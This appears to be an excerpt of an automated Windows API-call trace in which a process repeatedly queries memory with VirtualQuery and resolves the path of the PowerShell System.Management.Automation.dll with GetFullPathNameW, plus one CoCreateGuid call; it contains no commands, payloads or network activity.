	[0348.688] VirtualQuery (in: lpAddress=0xab4a0, lpBuffer=0xac360, dwLength=0x30 | out: lpBuffer=0xac360*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.688] VirtualQuery (in: lpAddress=0xab530, lpBuffer=0xac3f0, dwLength=0x30 | out: lpBuffer=0xac3f0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.690] VirtualQuery (in: lpAddress=0xabcb0, lpBuffer=0xacb70, dwLength=0x30 | out: lpBuffer=0xacb70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.690] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.691] VirtualQuery (in: lpAddress=0xabcb0, lpBuffer=0xacb70, dwLength=0x30 | out: lpBuffer=0xacb70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.692] VirtualQuery (in: lpAddress=0xabcb0, lpBuffer=0xacb70, dwLength=0x30 | out: lpBuffer=0xacb70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.694] VirtualQuery (in: lpAddress=0xabc10, lpBuffer=0xacad0, dwLength=0x30 | out: lpBuffer=0xacad0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.695] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.696] VirtualQuery (in: lpAddress=0xabc10, lpBuffer=0xacad0, dwLength=0x30 | out: lpBuffer=0xacad0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.697] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.697] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.697] VirtualQuery (in: lpAddress=0xabc10, lpBuffer=0xacad0, dwLength=0x30 | out: lpBuffer=0xacad0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.697] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.697] VirtualQuery (in: lpAddress=0xabc10, lpBuffer=0xacad0, dwLength=0x30 | out: lpBuffer=0xacad0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.697] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.697] VirtualQuery (in: lpAddress=0xabc10, lpBuffer=0xacad0, dwLength=0x30 | out: lpBuffer=0xacad0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.698] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.698] VirtualQuery (in: lpAddress=0xab8e0, lpBuffer=0xac7a0, dwLength=0x30 | out: lpBuffer=0xac7a0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.698] VirtualQuery (in: lpAddress=0xabc10, lpBuffer=0xacad0, dwLength=0x30 | out: lpBuffer=0xacad0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.698] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.699] VirtualQuery (in: lpAddress=0xabc10, lpBuffer=0xacad0, dwLength=0x30 | out: lpBuffer=0xacad0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.699] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.699] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x80d7cdbf, Data2=0xe322, Data3=0x41a9, Data4=([0]=0xb7, [1]=0x47, [2]=0xc5, [3]=0xe6, [4]=0x9c, [5]=0xa0, [6]=0xea, [7]=0xaa))) returned 0x0
	[0348.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.704] VirtualQuery (in: lpAddress=0xabcb0, lpBuffer=0xacb70, dwLength=0x30 | out: lpBuffer=0xacb70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.704] VirtualQuery (in: lpAddress=0xabcb0, lpBuffer=0xacb70, dwLength=0x30 | out: lpBuffer=0xacb70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0348.705] VirtualQuery (in: lpAddress=0xabcb0, lpBuffer=0xacb70, dwLength=0x30 | out: lpBuffer=0xacb70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.705] VirtualQuery (in: lpAddress=0xabc10, lpBuffer=0xacad0, dwLength=0x30 | out: lpBuffer=0xacad0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
